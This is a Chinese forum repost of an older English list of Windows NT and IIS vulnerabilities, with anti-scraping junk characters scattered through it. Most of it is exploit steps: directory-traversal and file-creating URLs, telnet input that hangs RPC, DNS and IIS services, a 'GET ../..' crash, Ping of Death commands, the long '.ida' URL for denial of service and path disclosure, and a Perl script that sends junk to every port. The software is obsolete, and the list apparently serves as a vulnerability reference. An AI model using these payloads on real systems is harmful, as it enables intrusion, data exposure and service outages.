標(biāo)題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時間: 2011-1-13 17:12 標(biāo)題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0 9 ]! M+ G+ e1 j6 }A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. * B) t* v! F* ? ! x! A$ B3 {9 l( D+ lA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.$ o# ^2 j; A1 R8 x# l9 D
" H* S( a S# Q. Y+ I! J& aBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.# l# D8 n7 Y8 z+ e7 i
! [ V' P4 _8 j" {! q-------------------------------------------------------------------- 0 n' D4 p- h8 A; Z; c" K7 v: }' `! ]# h& Q# J. X
受影響系統(tǒng):4.0 , J b. \- m3 S- Z) h4 m/ kA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. : y7 G; F1 M4 ]6 E* G/ B6 @% e0 P, o4 a4 t: ]; F7 I
If the file 'target.bat' exists, the file will be truncated. # [8 c/ |) D2 A! s$ N3 G" U. v5 \# U- y
. N2 O3 L3 S! j& @* \
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''. 6 E2 e2 c" O8 ?2 ]3 R* i- y c8 ^5 k' o7 n7 b1 ^5 {/ X
----------------------------------------------------------------------: i! u2 P8 X* b
- }1 m' C' m% \# l; }# H) ?
受影響系統(tǒng):3.51,4.01 K* z0 J2 g, S1 h* E$ ~ {
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.7 w$ x3 |& R/ O) c) s
* j$ v4 B" |6 z, O% DThe following steps; 2 N" c B3 z1 U4 ? ( T6 h. k7 Z8 _4 K/ u1 k& ~, }8 \Telnet to an NT 4.0 system on port 135 $ |6 R# P V, Z4 J' C- m
Type about 10 characters followed by a <CR> " \; I f% I2 H% ~7 n- ~3 J- HExit Telnet * f( ?+ B8 O% E% t xresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system. 3 \# @# K1 u& W5 W8 b% h" e! M2 }: t) w5 n
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.6 x: p0 x$ f- }$ P. K
/ g+ g; B4 `+ u! {The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted. , |3 c& i& d! I7 Z! ~6 x5 z& K! D' y; x: w/ Q) w" x6 S
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.5 w0 _# I9 L+ U" d% {* A- D' H2 _
; \( U2 c7 [' |The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):+ p' r* g9 \8 ~8 R; o- g
5 R4 v' L! ^0 guse Socket; ! j9 K# x( D Z/ ~use FileHandle; - L8 Y7 O E& m) _& grequire "chat2.pl";* r: s- o) W9 M4 ?
4 l- I. S; z( D6 H) N
$systemname = $ARGV[0] && shift;6 ]! G$ Q$ M$ I* m* V) K% R
8 u# F% V/ P7 N" K; {$verbose = 1; # tell me what you're hitting. r9 s$ w8 i- E; @
$knownports = 1; # don't hit known problem ports 1 D1 k* t* v+ v( T3 V* Efor ($port = $0; $port<65535; $port++) ) l! v$ K" ?) u7 H+ w+ a0 T{ ! f) ?( x! V& d+ [- [4 W 2 X- O( Z- X X# y; c0 m % ^& N+ R5 z9 H. e. G8 r2 k" `if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) { * |: j( O! ]9 i7 Knext;/ x2 R8 Y$ k2 M! v- N! h
}9 R, ^3 f% ~6 O7 r# d
$fh = chat::open_port($systemname, $port);! _0 B7 @- O' D
chat::print ($fh,"This is about ten characters or more");# t! V2 m0 L+ T! k
if ($verbose) { . o- D$ M" m4 I* E7 X0 }/ c& m" V( Yprint "Trying port: $port\n"; # a) r L- ]2 h" ~+ Q} , V- y# @/ E4 r0 S& Z( p$ F& `
chat::close($fh); * i5 c8 ?: J( f2 V& \/ A3 K: W7 j2 b4 B9 Z0 q$ b0 J
}4 q% n, k* L2 M) w
8 x, c: H/ i/ X: A$ w2 y- b2 m1 e4 X
. n e) X& p1 R/ _9 ?( i
/*end poke code*/7 E' p; V3 F$ R* G4 L; t
. O5 X7 T+ C: q' e( }- j4 \Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername $ Y, r8 x1 i7 W! N8 I. _& y( `0 K" x/ Q# N9 v
-------------------------------------------------------------------------------- " t$ t s4 C- A/ U. \' N9 p' ^0 B1 f: N6 ?
受影響系統(tǒng):4.0 ! z, c/ U, L+ OUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.5 k3 W( a' F0 V; P
; G. g, w8 k( I6 l R1 BThis attack causes Dr. Watson to display an alert window and to log an error: 4 Y; x. v+ v2 z2 V* W/ U
( A3 b" [& D7 r# F! s"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT" ) s( W9 o: V- N w 8 p% M' S- L/ C" y8 o--------------------------------------------------------------------------------4 ~$ h: t5 G# H: K% \
; t1 O7 z+ A5 t2 l& t+ T1 W受影響系統(tǒng):3.51,4.0% l6 N& @, z8 y6 z, I
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:9 \' W: ~: R3 r
% @0 k; W ?$ r9 qSTOP: 0X0000001E7 d# b2 }1 o# @! u! t- A5 S' d+ {
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS 6 D5 Z' J& x8 N ; H8 e) |0 F' k. h% @* ?-OR-: i3 z6 r% T$ a3 m; P, |; o; G/ y
2 ^* D6 I2 C8 W0 w! n. B. n
STOP: 0x0000000A # Z M* k/ k9 _$ Y. X, x$ N& `IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS9 }. |$ J8 [% y: U: o
2 f h! Y% k7 A+ LNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.9 D& p5 ?% T* m8 @) \& M
( f0 a5 A9 D% }" R3 S& V3 o7 q
--------------------------------------------------------------------------------2 g* I+ H+ I, J0 r- j* D( I- W6 n
6 I* O+ R4 F% M9 S: g% c$ X
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). " s* m7 K; s3 b$ y
5 @2 {! T- i' i& D# `+ A+ L
-------------------------------------------------------- $ a% A. C0 Y- d, r/ F6 N( [* s0 d) Y7 R- o. X
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server